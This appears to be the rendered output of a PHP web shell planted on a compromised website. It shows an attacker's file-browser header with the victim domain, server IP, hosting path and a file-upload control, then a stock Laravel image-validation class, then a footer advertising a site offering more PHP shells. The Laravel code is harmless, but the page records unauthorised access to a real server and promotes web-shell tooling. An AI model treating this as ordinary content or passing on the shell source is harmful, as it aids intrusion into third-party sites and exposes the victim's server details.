Domain: amberpublishers.in
Server Adress: 86.38.243.169

privdayz.com

/home/u866425823/public_html/vendor/laravel/framework/src/Illuminate/Validation/Rules/
Dosya Yükle :
Current File : /home/u866425823/public_html/vendor/laravel/framework/src/Illuminate/Validation/Rules/ImageFile.php

<?php

namespace Illuminate\Validation\Rules;

class ImageFile extends File
{
    /**
     * Create a new image file rule instance.
     *
     * @return void
     */
    public function __construct()
    {
        $this->rules('image');
    }

    /**
     * The dimension constraints for the uploaded file.
     *
     * @param  \Illuminate\Validation\Rules\Dimensions  $dimensions
     */
    public function dimensions($dimensions)
    {
        $this->rules($dimensions);

        return $this;
    }
}

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.